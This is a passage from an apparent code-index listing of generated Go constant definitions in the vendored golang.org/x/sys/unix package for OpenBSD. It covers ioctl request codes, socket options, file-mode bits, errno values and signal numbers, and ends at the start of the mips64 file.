SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8028698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_mips64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc010427b constant BIOCGETIF (line 